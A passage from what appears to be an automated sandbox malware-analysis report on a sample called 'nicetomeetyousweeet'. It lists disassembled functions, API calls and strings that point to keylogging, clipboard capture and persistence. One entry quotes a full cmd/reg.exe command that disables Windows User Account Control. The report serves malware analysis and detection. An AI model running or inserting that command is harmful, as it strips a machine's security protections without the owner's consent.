                                                                                • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                • Instruction Fuzzy Hash: A931FAB1945319ABD720EB24EC48E9F77DCEF44794F044929F844D3201E778D9818BEA
                                                                                Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                • API String ID: 2974294136-753205382
                                                                                • Opcode ID: f9ce729fc68a8e54cedf029c1ca87353c365b71fd45938a9d20d4a412a6221dd
                                                                                • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                • Opcode Fuzzy Hash: f9ce729fc68a8e54cedf029c1ca87353c365b71fd45938a9d20d4a412a6221dd
                                                                                • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                • wsprintfW.USER32 ref: 0040A905
                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EventLocalTimewsprintf
                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                • API String ID: 1497725170-248792730
                                                                                • Opcode ID: 7416a7beddcc99ce8dbcdefecb6347c9b5b607241f8dba009b026989dc958aec
                                                                                • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                • Opcode Fuzzy Hash: 7416a7beddcc99ce8dbcdefecb6347c9b5b607241f8dba009b026989dc958aec
                                                                                • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                • String ID: `AG
                                                                                • API String ID: 1958988193-3058481221
                                                                                • Opcode ID: 4ebf0acc99a1bd76ecb676338ad5ca66b749e389f9c6bdc81adf82034e374675
                                                                                • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                • Opcode Fuzzy Hash: 4ebf0acc99a1bd76ecb676338ad5ca66b749e389f9c6bdc81adf82034e374675
                                                                                • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                • GetLastError.KERNEL32 ref: 0041CA91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                • String ID: 0$MsgWindowClass
                                                                                • API String ID: 2877667751-2410386613
                                                                                • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                Function 0079CC86 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegisterClassExA.USER32(00000030), ref: 0079CCD3
                                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0079CCEE
                                                                                • GetLastError.KERNEL32 ref: 0079CCF8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                • String ID: 0$MsgWindowClass
                                                                                • API String ID: 2877667751-2410386613
                                                                                • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                • Instruction ID: 40102a1df2c1d072663dacaacd60728356b14cae04bb7ee58e7eff36dab19d78
                                                                                • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                • Instruction Fuzzy Hash: 8501E5B1D1421EAB9B01DFEAEDC49EFBBBDBE49255B50453AE410B2100E7709A448BA4
                                                                                Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                Strings
                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateProcess
                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                • API String ID: 2922976086-4183131282
                                                                                • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002), ref: 004425F9
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000), ref: 0044262F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: pth_unenc$BG
                                                                                • API String ID: 1818849710-2233081382
                                                                                • Opcode ID: 7b30edb4b73959b963a827f55bfb040984e2e784fd155cea8a61af405a6566e3
                                                                                • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                • Opcode Fuzzy Hash: 7b30edb4b73959b963a827f55bfb040984e2e784fd155cea8a61af405a6566e3
                                                                                • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                • String ID: KeepAlive | Disabled
                                                                                • API String ID: 2993684571-305739064
                                                                                • Opcode ID: 8aa150007e8bf14f7c51783879dca455fdcc96e85f7bfc2b73a29f2336cb496a
                                                                                • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                • Opcode Fuzzy Hash: 8aa150007e8bf14f7c51783879dca455fdcc96e85f7bfc2b73a29f2336cb496a
                                                                                • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                Function 00419F32 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                • String ID: Alarm triggered
                                                                                • API String ID: 614609389-2816303416
                                                                                • Opcode ID: b6a31acd189e4046641eb45152315503d0aef81ef7f0fd696b7e402a16cb71a5
                                                                                • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                • Opcode Fuzzy Hash: b6a31acd189e4046641eb45152315503d0aef81ef7f0fd696b7e402a16cb71a5
                                                                                • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                Strings
                                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                • API String ID: 3024135584-2418719853
                                                                                • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                                                                                • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                • Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                                                                                • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                Function 007C03D1 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e2c0e9d55fcd13551ec2678028d06ddb1c515a5452d77a18986bab3fa9fe77ab
                                                                                • Instruction ID: 926e15e796636d2f79c7e6a25747ddab6cec719cb10788d27c6a016607e4424a
                                                                                • Opcode Fuzzy Hash: e2c0e9d55fcd13551ec2678028d06ddb1c515a5452d77a18986bab3fa9fe77ab
                                                                                • Instruction Fuzzy Hash: EE719C31900256DBCB218FA4D884FBFBB75EF95320F24422DE951A7181D7788DA1CBE1
                                                                                Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                • String ID:
                                                                                • API String ID: 3525466593-0
                                                                                • Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                                                                                • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                • Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                                                                                • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                Function 007C41E2 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 3033488037-0
                                                                                • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                • Instruction ID: 4896d5451c863e914be1f156b1f4c5b5aa38a38608969b1be4d3badabb09c323
                                                                                • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                • Instruction Fuzzy Hash: E0518E32A00608EFDB20DF69D852FAA77F5FB59720B14466DE809EB251E739DD41CB80
                                                                                Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                  • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                  • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 2180151492-0
                                                                                • Opcode ID: dfac8ff653820aa2ab6d508390a1137ba5fb2a73f2ca9f5feaa092644f312b56
                                                                                • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                • Opcode Fuzzy Hash: dfac8ff653820aa2ab6d508390a1137ba5fb2a73f2ca9f5feaa092644f312b56
                                                                                • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
